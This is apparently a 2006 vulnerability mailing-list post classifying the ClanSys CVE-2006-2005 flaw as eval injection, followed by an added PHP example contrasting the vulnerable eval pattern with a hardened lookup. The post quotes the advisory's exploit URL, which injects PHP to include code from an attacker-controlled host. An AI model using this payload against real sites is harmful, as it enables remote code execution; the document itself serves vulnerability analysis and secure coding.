[VIM] ClanSys issue might be eval injection, not file inclusion
Steven M. Christey
coley at mitre.org
Tue May 2 17:31:42 EDT 2006

Ref: CVE-2006-2005
Advisory: Clansys <= 1.1 PHP Code Insertion Vulnerability.
http://www.securityfocus.com/archive/1/archive/1/431873/100/0/threaded

This looks like eval injection, not file inclusion, as most VDBs seem
to be claiming.

from the post:

    You can find vulnerable code at line 126 as an
    Code->
    eval("?>" . $output);
    <-Code
    Purely nice coding isn't it?;)

That's a funny-looking eval to me with the "?>" starting out, but
presumably the $page variable feeds into $output.

Where people got tripped up on file inclusion was in the demonstration
exploit:

    http://[victim]/[ClanSysPath]/index.php?page=<?include($s);?>&s=http://yourhost.com/cmd.txt?

Note that the page parameter actually uses PHP <?> sequences to
execute the include statement. Using the code above, we would have:

    eval("?>" . "<?include($s);?>");

which is

    ?><?include($s);?>

Turns out that the leading "?>" is a hint to eval() to support parsing
of "<?" and "?>" sequences - otherwise you'd get a parse error. Cute.

- Steve
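
The eval() behaviour discussed in the message above, as an added example that is not part of the original post or of ClanSys: it runs the same constructed strings through a bare eval(), through the advisory's eval("?>" . $output) pattern, and through a lookup that never parses request data. The function names, page list and sample strings are assumptions, and the embedded block uses the long open tag so the result does not depend on the short_open_tag setting.

```php
<?php
/* Added illustration, not ClanSys code. The function names and the sample
   strings are constructed; only the eval() pattern comes from the advisory. */

/* Run eval() on $code, capture what it prints, and report parse failures. */
function run_eval(string $code): string
{
    ob_start();
    try {
        eval($code);
        return ob_get_clean();
    } catch (ParseError $e) {
        ob_end_clean();
        return '[ParseError]';
    }
}

/* The advisory's pattern: the leading close tag switches eval() to template
   mode, so $output is echoed as text and any embedded PHP block is executed. */
function render_vulnerable(string $output): string
{
    return run_eval("?>" . $output);
}

/* Hardened: request data only selects from fixed content and is never parsed
   as PHP; anything echoed back is escaped. */
function render_hardened(string $page): string
{
    $pages = ['home' => 'Welcome', 'roster' => 'Clan roster'];
    return $pages[$page]
        ?? 'Unknown page: ' . htmlspecialchars($page, ENT_QUOTES, 'UTF-8');
}

/* Constructed inputs: a page name, plain markup, a harmless embedded block. */
$samples = ['roster', 'Hello <b>world</b>', 'sum=<?php echo 6 * 7; ?>'];

foreach ($samples as $s) {
    printf("input     : %s\n", $s);
    printf("bare eval : %s\n", run_eval($s));
    printf("'?>' eval : %s\n", render_vulnerable($s));
    printf("hardened  : %s\n\n", render_hardened($s));
}
```

Because the code executes inside eval() itself, the issue classifies as eval injection; the remote include in the demonstration URL is only one possible payload.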